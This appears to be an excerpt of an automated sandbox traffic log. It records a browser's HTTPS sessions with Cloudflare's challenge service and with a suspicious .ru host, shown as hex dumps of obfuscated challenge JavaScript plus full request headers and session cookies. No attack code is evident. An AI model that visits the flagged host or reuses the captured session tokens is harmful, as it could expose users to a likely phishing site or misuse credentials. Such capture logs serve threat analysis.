                                                            Data Ascii: (514)](0)){for(C=0;d[he(1687)](C,I);K<<=1,d[he(551)](L,d[he(727)](o,1))?(L=0,J[he(702)](d[he(647)](s,K)),K=0):L++,C++);for(P=F[he(514)](0),C=0;8>C;K=d[he(1906)](K<<1.86,1.86&P),L==o-1?(L=0,J[he(702)](d[he(647)](s,K)),K=0):L++,P>>=1,C++);}else{for(P=1,C=0;
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 64 5b 68 65 28 31 36 38 37 29 5d 28 43 2c 49 29 3b 4b 3d 64 5b 68 65 28 37 36 36 29 5d 28 4b 2c 31 29 7c 64 5b 68 65 28 39 37 36 29 5d 28 50 2c 31 29 2c 4c 3d 3d 64 5b 68 65 28 31 39 33 31 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 37 30 32 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 47 2d 2d 2c 47 3d 3d 30 26 26 49 2b 2b 7d 66 6f 72 28 50 3d 32 2c 43 3d 30 3b 64 5b 68 65 28 31 35 37 39 29 5d 28 43 2c 49 29 3b 4b 3d 4b 3c 3c 31 2e 32 34 7c 64 5b 68 65 28 39 37 36 29 5d 28 50 2c 31 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 68 65 28 37 30 32 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b
                                                            Data Ascii: E[F]}else for(P=D[F],C=0;d[he(1687)](C,I);K=d[he(766)](K,1)|d[he(976)](P,1),L==d[he(1931)](o,1)?(L=0,J[he(702)](s(K)),K=0):L++,P>>=1,C++);G--,G==0&&I++}for(P=2,C=0;d[he(1579)](C,I);K=K<<1.24|d[he(976)](P,1),o-1==L?(L=0,J[he(702)](s(K)),K=0):L++,P>>=1,C++
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 68 28 31 32 32 36 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 68 68 28 31 34 33 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 68 28 31 34 33 38 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 68 28 31 32 33 30 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 68 28 36 34 39 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 68 28 31 35 34 38 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 68 28 35 35 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 68 28 36 36 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c
                                                            Data Ascii: h(1226)](G,H),H>>=1,d[hh(1436)](0,H)&&(H=j,G=o(I++)),J|=d[hh(1438)](0<L?1:0,F),F<<=1);s[B++]=e(J),M=d[hh(1230)](B,1),x--;break;case 1:for(J=0,K=Math[hh(649)](2,16),F=1;d[hh(1548)](F,K);L=H&G,H>>=1,d[hh(551)](0,H)&&(H=j,G=d[hh(662)](o,I++)),J|=(0<L?1:0)*F,
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 30 31 35 29 5d 28 6d 2c 32 35 35 29 2c 6a 29 2d 69 25 36 35 35 33 35 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 68 5a 28 37 32 39 29 5d 28 27 27 29 7d 2c 66 77 3d 7b 7d 2c 66 77 5b 67 4a 28 34 39 36 29 5d 3d 27 6f 27 2c 66 77 5b 67 4a 28 34 39 32 29 5d 3d 27 73 27 2c 66 77 5b 67 4a 28 35 32 36 29 5d 3d 27 75 27 2c 66 77 5b 67 4a 28 39 33 35 29 5d 3d 27 7a 27 2c 66 77 5b 67 4a 28 31 39 33 30 29 5d 3d 27 6e 27 2c 66 77 5b 67 4a 28 31 34 32 37 29 5d 3d 27 49 27 2c 66 77 5b 67 4a 28 31 36 38 34 29 5d 3d 27 62 27 2c 66 78 3d 66 77 2c 65 4d 5b 67 4a 28 36 35 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 35 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 35 3d 67 4a 2c 6f 3d 7b 27 74 47 53 43 66 27 3a
                                                            Data Ascii: 015)](m,255),j)-i%65535+65535,255))));return k[hZ(729)]('')},fw={},fw[gJ(496)]='o',fw[gJ(492)]='s',fw[gJ(526)]='u',fw[gJ(935)]='z',fw[gJ(1930)]='n',fw[gJ(1427)]='I',fw[gJ(1684)]='b',fx=fw,eM[gJ(653)]=function(g,h,i,j,i5,o,x,B,C,D,E,F){if(i5=gJ,o={'tGSCf':
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 28 27 66 27 2c 6c 29 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 69 5b 69 37 28 31 35 32 32 29 5d 28 6d 2c 68 5b 6a 5b 6b 5d 5d 5b 69 37 28 38 38 33 29 5d 29 3b 69 5b 69 37 28 31 36 31 39 29 5d 28 2d 31 2c 67 5b 6c 5d 5b 69 37 28 31 38 35 30 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 26 26 28 69 5b 69 37 28 39 39 32 29 5d 28 66 43 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 69 37 28 37 30 32 29 5d 28 69 5b 69 37 28 31 34 37 33 29 5d 28 27 6f 2e 27 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 69 37 28 31 32 32 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d 2c 65 4d 5b 67 4a 28 31 37 34 31 29 5d 3d
                                                            Data Ascii: ('f',l)&&(l='N'),g[l]){for(m=0;i[i7(1522)](m,h[j[k]][i7(883)]);i[i7(1619)](-1,g[l][i7(1850)](h[j[k]][m]))&&(i[i7(992)](fC,h[j[k]][m])||g[l][i7(702)](i[i7(1473)]('o.',h[j[k]][m]))),m++);}else g[l]=h[j[k]][i7(1224)](function(n){return'o.'+n})},eM[gJ(1741)]=
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 3b 63 61 73 65 27 33 27 3a 6f 3d 28 6e 3d 7b 7d 2c 6e 5b 69 61 28 36 38 38 29 5d 3d 65 4d 5b 69 61 28 31 31 36 31 29 5d 5b 69 61 28 36 38 38 29 5d 2c 6e 5b 69 61 28 31 35 35 31 29 5d 3d 65 4d 5b 69 61 28 31 31 36 31 29 5d 5b 69 61 28 31 35 35 31 29 5d 2c 6e 5b 69 61 28 31 36 34 35 29 5d 3d 65 4d 5b 69 61 28 31 31 36 31 29 5d 5b 69 61 28 31 36 34 35 29 5d 2c 6e 5b 69 61 28 39 37 31 29 5d 3d 65 4d 5b 69 61 28 31 31 36 31 29 5d 5b 69 61 28 31 35 39 32 29 5d 2c 6e 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 78 3d 28 73 3d 7b 7d 2c 73 5b 69 61 28 39 33 38 29 5d 3d 67 2c 73 5b 69 61 28 31 32 34 34 29 5d 3d 48 2c 73 2e 63 63 3d 68 2c 73 5b 69 61 28 34 39 31 29 5d 3d 46 2c 73 5b 69 61 28 36 34 30 29 5d 3d 6f 2c 4a 53 4f 4e 5b 69 61 28 38 32 37 29 5d
                                                            Data Ascii: ;case'3':o=(n={},n[ia(688)]=eM[ia(1161)][ia(688)],n[ia(1551)]=eM[ia(1161)][ia(1551)],n[ia(1645)]=eM[ia(1161)][ia(1645)],n[ia(971)]=eM[ia(1161)][ia(1592)],n);continue;case'4':x=(s={},s[ia(938)]=g,s[ia(1244)]=H,s.cc=h,s[ia(491)]=F,s[ia(640)]=o,JSON[ia(827)]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.449765104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:49 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:50 UTC240INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce217f8eb0f85-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.449755104.21.32.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:50 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                            Host: gimd.lamantatio.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://gimd.lamantatio.ru/ZSei/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: XSRF-TOKEN=eyJpdiI6ImpxTVJPTzNTN2hiYzRLdXVvaEsyakE9PSIsInZhbHVlIjoiTmhjQ0RaL0hVSVdBTG9zRTc2Z2M2T2UzdFVqcWxKdUIwWWZqYzFqY29OSUNEcjltOEwyQ2FtdzkrR0ZERjFQc0toSlN1eWoyODhvdTlXWEkybkNHeFB4Ny92QnM0UHNSWEZaZEg2M05MQTgvQWxrUDdTejg1RFFWWjU3WDJMRXIiLCJtYWMiOiJmZDRlMTU4OTI1MzEzYmE5MjYzMWFjYTFhOWRkYTYyNTgwMzA3NTM1ZTE1YTUxMmRhMjQ0NzczY2Y2ZDRlOGU2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdoMDY4M2FLeWhzMWp1VlVWd1NpQUE9PSIsInZhbHVlIjoiVHdTWVo3QWh2WEZWNjBpcmsxMnNDMmVqaWM2UWRHdmhIT1ZNOW5TOXJHM1BWZlFsYnZWNkdrbDkzNjJseU96dW9SNGppVEVvV0hBUVVKMEJRSUp6clF0UWZKcE1jN09vL0k0Ly9kRlI2bGw4Y3JaMEgvaitaNWFQWk9VN0V2YmUiLCJtYWMiOiI2YTlhZDkxODg3M2MzOTk1ZmY5YWZlMmYwZTlmNWMwYmU2MWE4NTFjN2VlMTQ3OWIyODNhMDk2ZDE1ZDAyYzkwIiwidGFnIjoiIn0%3D
                                                            2025-01-06 15:53:50 UTC1069INHTTP/1.1 404 Not Found
                                                            Date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdpIZKKqqx11o5ZVaW2tlnX59dKgCqnlnHzP4yrnJFctlnFm6CCmxAPzbb3NWKTe0e4MkC6pxUuwDvB1NxeaHuGeXHA%2FyJFM2iGDrQNYv%2FXKl%2FuquQXc2I8Fgo7fLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1222&min_rtt=1215&rtt_var=471&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1353&delivery_rate=2230227&cwnd=252&unsent_bytes=0&cid=532cbb5da6e4db82&ts=401&x=0"
                                                            CF-Cache-Status: HIT
                                                            Age: 12675
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce21a4af11875-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1679&rtt_var=639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1898&delivery_rate=1700640&cwnd=153&unsent_bytes=0&cid=4d4c868f66a50e1f&ts=3882&x=0"
                                                            2025-01-06 15:53:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.449766104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:50 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:50 UTC240INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce21bffef7d1e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.449767104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:50 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fdce2128ada41f5&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:50 UTC331INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:50 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 113411
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce21d29ae78d6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66
                                                            Data Ascii: 0more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22ref
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 67 35 2c 67 36 2c 67 77 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 67 33 2c 67 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 35 39 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 31 35 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 33 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 39 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 32 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 33 32 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                                            Data Ascii: g5,g6,gw,gA,gB,gF,gG,gH,g3,g4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(487))/1+-parseInt(gI(659))/2+-parseInt(gI(1115))/3+-parseInt(gI(1453))/4+parseInt(gI(1159))/5*(parseInt(gI(622))/6)+-parseInt(gI(232))/7*(-parseInt(gI(
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 32 37 29 5b 67 4d 28 35 36 39 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 44 5b 67 4d 28 39 30 36 29 5d 28 43 2c 48 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 67 5b 67 4d 28 31 33 36 31 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 67 4d 28 31 33 36 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 37 35 36 29 5d 28 67 5b 67 4d 28 31 33 36 31 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 35 31 33 29 5d 28 67 5b 67 4d 28 31 33 36 31 29 5d 29 29 3a 67 5b 67 4d 28 31 33 36 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 37 35 36 29 5d 28 67 5b 67 4d 28 31 33 36 31 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 44 5b 67 4d 28 32 38 36 29 5d 28 6b 5b
                                                            Data Ascii: 27)[gM(569)]('|'),m=0;!![];){switch(l[m++]){case'0':D[gM(906)](C,H,!![]);continue;case'1':g[gM(1361)]instanceof Error?g[gM(1361)]=JSON[gM(756)](g[gM(1361)],Object[gM(513)](g[gM(1361)])):g[gM(1361)]=JSON[gM(756)](g[gM(1361)]);continue;case'2':D[gM(286)](k[
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 59 64 6b 69 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 65 5b 67 4e 28 38 35 33 29 5d 28 67 4e 28 31 32 33 30 29 2c 65 5b 67 4e 28 34 31 35 29 5d 29 3f 28 68 2b 2b 2c 69 28 6a 2c 6b 2c 65 5b 67 4e 28 31 34 38 39 29 5d 28 6c 2c 31 29 29 29 3a 28 66 3d 64 5b 67 4e 28 39 38 34 29 5d 2c 64 5b 67 4e 28 31 33 32 36 29 5d 26 26 65 5b 67 4e 28 38 35 33 29 5d 28 74 79 70 65 6f 66 20 64 5b 67 4e 28 31 33 32 36 29 5d 2c 67 4e 28 31 30 37 37 29 29 29 26 26 28 6a 3d 64 5b 67 4e 28 31 33 32 36 29 5d 5b 67 4e 28 35 36 39 29 5d 28 27 5c 6e 27 29 2c 6a 5b 67 4e 28 38 34 31 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c
                                                            Data Ascii: Ydkij':function(n,o,s){return n(o,s)}},d instanceof Error)?e[gN(853)](gN(1230),e[gN(415)])?(h++,i(j,k,e[gN(1489)](l,1))):(f=d[gN(984)],d[gN(1326)]&&e[gN(853)](typeof d[gN(1326)],gN(1077)))&&(j=d[gN(1326)][gN(569)]('\n'),j[gN(841)]>1)&&(k=/^\s*at\s+(.+):(\
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 5b 5d 2c 21 65 55 28 67 4a 28 31 30 30 32 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 65 2c 63 2c 64 2c 65 29 7b 69 65 3d 67 4a 2c 63 3d 7b 27 4c 71 69 46 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 65 28 31 65 33 29 5d 5b 69 65 28 36 34 37 29 5d 7c 7c 31 65 34 2c 65 3d 66 50 28 29 2c 21 65 4d 5b 69 65 28 31 33 33 33 29 5d 26 26 21 63 5b 69 65 28 39 34 37 29 5d 28 66 75 29 26 26 21 65 4d 5b 69 65 28 38 38 33 29 5d 5b 69 65 28 31 30 38 32 29 5d 26 26 65 2d 66 4f 3e 64 3f 66 61 28 29 3a 69 65 28 39 33 37 29 3d 3d 3d 69 65 28 31 30 33 32 29 3f 64 5b 69 65 28 33 34 36 29 5d 28 29 3a 66 62 28 29 7d 2c 31 65 33 29 29 2c 66 53 3d 7b 7d 2c 66 53 5b 67 4a
                                                            Data Ascii: [],!eU(gJ(1002))&&(fR(),setInterval(function(ie,c,d,e){ie=gJ,c={'LqiFK':function(f){return f()}},d=eM[ie(1e3)][ie(647)]||1e4,e=fP(),!eM[ie(1333)]&&!c[ie(947)](fu)&&!eM[ie(883)][ie(1082)]&&e-fO>d?fa():ie(937)===ie(1032)?d[ie(346)]():fb()},1e3)),fS={},fS[gJ
                                                            2025-01-06 15:53:50 UTC1369INData Raw: 38 29 5d 29 29 3f 28 73 3d 7b 7d 2c 73 5b 6a 6d 28 31 30 31 36 29 5d 3d 6a 6d 28 32 31 37 29 2c 73 5b 6a 6d 28 35 37 39 29 5d 3d 67 5b 6a 6d 28 31 65 33 29 5d 5b 6a 6d 28 37 33 31 29 5d 2c 73 5b 6a 6d 28 31 31 37 34 29 5d 3d 6a 6d 28 31 35 34 30 29 2c 73 5b 6a 6d 28 36 35 37 29 5d 3d 68 2c 66 5b 6a 6d 28 31 31 37 31 29 5d 5b 6a 6d 28 39 31 36 29 5d 28 73 2c 27 2a 27 29 29 3a 68 5e 3d 6a 5b 6a 6d 28 34 36 36 29 5d 28 6d 29 7d 29 2c 63 3d 65 4d 5b 6a 6c 28 31 33 30 33 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 6a 6c 28 37 33 34 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 6a 6c 28 34 36 36 29 5d 28 2b 2b 67 29 29 3b 69 5b 6a 6c 28 38 31 37 29 5d 28 53 74 72 69 6e 67 5b 6a 6c 28 34 38 30 29 5d 28 66 5b 6a 6c 28 31 31 31 37 29 5d 28 66 5b 6a 6c 28 32
                                                            Data Ascii: 8)]))?(s={},s[jm(1016)]=jm(217),s[jm(579)]=g[jm(1e3)][jm(731)],s[jm(1174)]=jm(1540),s[jm(657)]=h,f[jm(1171)][jm(916)](s,'*')):h^=j[jm(466)](m)}),c=eM[jl(1303)](c),i=[],g=-1;!f[jl(734)](isNaN,k=c[jl(466)](++g));i[jl(817)](String[jl(480)](f[jl(1117)](f[jl(2
